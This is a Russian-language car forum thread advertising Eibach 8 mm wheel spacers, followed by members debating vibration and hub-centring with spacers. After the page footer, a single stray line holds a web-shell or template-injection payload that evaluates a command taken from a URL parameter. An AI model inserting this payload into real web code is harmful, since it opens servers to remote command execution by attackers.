+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя
Показано с 1 по 10 из 18

Тема: Продам 4 проставки Eibach 8мм + болты


  1. #1
    GTI-Racing Артем 35 is on a distinguished road Аватар для Артем 35
    Регистрация
    11.12.2013
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    44

    Продам 4 проставки Eibach 8мм + болты

    SAM_4375.JPGSAM_4372.JPGSAM_4373.jpgSAM_4374.JPGПродам проставки Eibach. Толщина простаки 8мм (увеличении колеи на 16мм соответственно). В комплекте 4 проставки, оригинальная упаковка, CD с какой-то информацией (честно, не смотрел) и комплект из 20 удлиненных именно под эти проставки оригинальных болтов. Параметры для Октавии, Гольфа и всех соплатформенников (5х112, 57,1). Комплект новый, попробовал поставить только одну проставку на переднее колесо, оказалась тонкой для моих тормозов и дисков с 54 вылетом, себе буду заказывать более толстые, но если кто-то хочет добавить агрессии к внешнему виду своего авто, улучшить управляемость или если кому-то просто кажется что его диски сидят глубоко в арках, то 8мм в самый раз!!! ))) Цена за все 7 тыс. руб. Отправка транспортной куда угодно!!! По возможности прошу звонить или писать +7921545577семь (есть вайбер и вотсап). Всем добра!

  2. #2
    Модератор koljamba will become famous soon enough Аватар для koljamba
    Регистрация
    31.07.2012
    Откуда
    москва
    Машина
    superb
    Сообщений
    239
    и еще, добавить вибрации в руль)))

  3. #3
    GTI-Racing Virus312 is on a distinguished road Аватар для Virus312
    Регистрация
    17.10.2012
    Откуда
    Msk
    Машина
    Gilf Gti MK6
    Сообщений
    55
    Цитата Сообщение от koljamba Посмотреть сообщение
    и еще, добавить вибрации в руль)))
    Вибрации будут только на высоких скоростях... Преимущественно на торможении...

  4. #4
    GTI-Racing Артем 35 is on a distinguished road Аватар для Артем 35
    Регистрация
    11.12.2013
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    44
    По поводу биения ничего сказать не смогу - я не ездил на них. Себе заказал 1,5 мм, как покатаюсь - отпишусь!
    Я специально искал проставки нормальной фирмы типа Eibach или H&R, правда последние стоят 12 тыс. руб. за комплект, чтобы исключить вероятность брака/биения/вибраций и т.п. по этому думаю что все будет ок при условии ровных отбалансированных колес, почищенных посадочных на дисках и ступице перед установкой проставки и рекомендуймой затяжки (120 н/м) нормальными человеческими болтами....

  5. #5
    GTI-Racing Virus312 is on a distinguished road Аватар для Virus312
    Регистрация
    17.10.2012
    Откуда
    Msk
    Машина
    Gilf Gti MK6
    Сообщений
    55
    Цитата Сообщение от Артем 35 Посмотреть сообщение
    По поводу биения ничего сказать не смогу - я не ездил на них. Себе заказал 1,5 мм, как покатаюсь - отпишусь!
    Я специально искал проставки нормальной фирмы типа Eibach или H&R, правда последние стоят 12 тыс. руб. за комплект, чтобы исключить вероятность брака/биения/вибраций и т.п. по этому думаю что все будет ок при условии ровных отбалансированных колес, почищенных посадочных на дисках и ступице перед установкой проставки и рекомендуймой затяжки (120 н/м) нормальными человеческими болтами....
    У меня стояли H&R 5мм, до 110км/ч все нормально, свыше биение на торможении (не критичное, терпимое, но как-то раздражающее).

  6. #6
    Мимо проходил kOOlik is on a distinguished road Аватар для kOOlik
    Регистрация
    02.05.2014
    Откуда
    Москва
    Машина
    freetrack superb
    Сообщений
    39
    В таких маленьких проставках проблема в том что они по факту укорачивают посадочный буртик (там где у нас 57,1 мм). Рискну предположить что в ряде случаев диск уже не держится за посадочное место а сидит и центрируется только на болтах. Вот в более широких идет свой буртик. У меня стоят на 15 - вибраций дополнительных относительно стока не добавилось.

  7. #7
    GTI-Racing Virus312 is on a distinguished road Аватар для Virus312
    Регистрация
    17.10.2012
    Откуда
    Msk
    Машина
    Gilf Gti MK6
    Сообщений
    55
    Цитата Сообщение от kOOlik Посмотреть сообщение
    В таких маленьких проставках проблема в том что они по факту укорачивают посадочный буртик (там где у нас 57,1 мм). Рискну предположить что в ряде случаев диск уже не держится за посадочное место а сидит и центрируется только на болтах. Вот в более широких идет свой буртик. У меня стоят на 15 - вибраций дополнительных относительно стока не добавилось.
    Именно.
    Хотя на 5мм еще бортика прилично остается...)))

  8. #8
    Мимо проходил kOOlik is on a distinguished road Аватар для kOOlik
    Регистрация
    02.05.2014
    Откуда
    Москва
    Машина
    freetrack superb
    Сообщений
    39
    Цитата Сообщение от Virus312 Посмотреть сообщение
    Именно.
    Хотя на 5мм еще бортика прилично остается...)))
    А ты посмотри на посадочное место диска. Там почти на всех скос идет очень приличный, мне кажется что -5мм может весьма существенно сказаться.

  9. #9
    GTI-Racing Yasik is on a distinguished road Аватар для Yasik
    Регистрация
    24.01.2013
    Откуда
    Msfnct
    Машина
    VW Golf 5 GTI
    Сообщений
    424
    У меня стоят диски через эксцентрики, плюс пластиковое кольцо ЦО + 6 мм в круг.

    ВИБРАЦИИ НЕТ.

    Мне кажется, что все это ерунда и додумки. Единственное, что увеличивается нагрузка на ступичные подшипники, но кого это волнует?))))

  10. #10
    GTI-Racing Virus312 is on a distinguished road Аватар для Virus312
    Регистрация
    17.10.2012
    Откуда
    Msk
    Машина
    Gilf Gti MK6
    Сообщений
    55
    Цитата Сообщение от kOOlik Посмотреть сообщение
    А ты посмотри на посадочное место диска. Там почти на всех скос идет очень приличный, мне кажется что -5мм может весьма существенно сказаться.
    У меня посадочное на диске больше чем 57.1, так что я поехал в РЛД где мне сделали проставочные кольца без скоса.
    Думал поможет, но нет...

+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя

Похожие темы

  1. Продам проставки H&R и BIMECC 5,8,10мм и болты
    от Balabuev в разделе Шины/диски
    Ответов: 12
    Последнее сообщение: 03.01.2024, 03:07
  2. Проставки Eibach Pro-Spacer
    от xard в разделе Тюнинг
    Ответов: 4
    Последнее сообщение: 02.02.2016, 10:30
  3. проставки 15 мм + болты
    от qwerty585 в разделе Шины/диски
    Ответов: 1
    Последнее сообщение: 28.05.2015, 13:55
  4. проставки 15 мм + болты
    от qwerty585 в разделе Шины/диски
    Ответов: 0
    Последнее сообщение: 14.04.2015, 15:33
  5. Ответов: 0
    Последнее сообщение: 16.05.2012, 07:56

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}